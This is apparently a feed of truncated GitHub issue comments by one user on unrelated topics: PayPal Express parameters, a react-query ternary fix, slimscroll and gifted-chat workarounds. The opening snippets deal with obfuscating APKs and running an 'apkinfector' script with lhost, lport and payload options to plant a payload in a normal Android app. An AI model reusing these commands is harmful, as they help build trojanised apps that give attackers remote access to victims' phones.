MR_AMDEV
MR_AMDEV
@dfdfdfs If your apk doesn't work then i have following suggestions for you: 1) First of all Use the basic command: ```python3.7 -m obfuscapk.cli -p -d /root/Desktop/obfuscated.apk -o Rebuild -o...
Ok lets me check it i ll be back soon
Now the directory issue is solved although the problem remains the same:(used the **updated git repo**) ``` root@kali:~/Downloads/apkinfector# python3 infector.py --lhost 192.168.10.11 --lport 4555 --apk-name lite_payload --normal-apk /root/Desktop/lite.apk ╔─────────────────────────────────────────────────────────╗ |...
Looking forward
Hello, I am also in a need to findout the original event ,in my case on opening the context menu i lost my hover style for the selector element ....
Try signing your apk
Hi @GabbasovDinar , Its the issue that exist with slimscroll it needs moderation but i have found a temporary workaround for this by changing a few lines of codes ....
> This issue is not about server to server. > > For Paypal Express gateway call `completePurchase()` need pass array with from paypal-added get params `token` and `PayerID` values. (example:...
+1 Facing the same issue. The solution is to wrap the ternaries in a bracket. **before:** `queryKey: optionsQueryKey ?? variables === undefined ? ['Modules.infinite'] : ['Modules.infinite', variables], ` **after:** `queryKey:...
Same issue, but i have done the following workaround (it works fine for me): ``` import { InputToolbar } from 'react-native-gifted-chat'; ``` ``` renderInputToolbar={(props) => ( ( )} /> )}...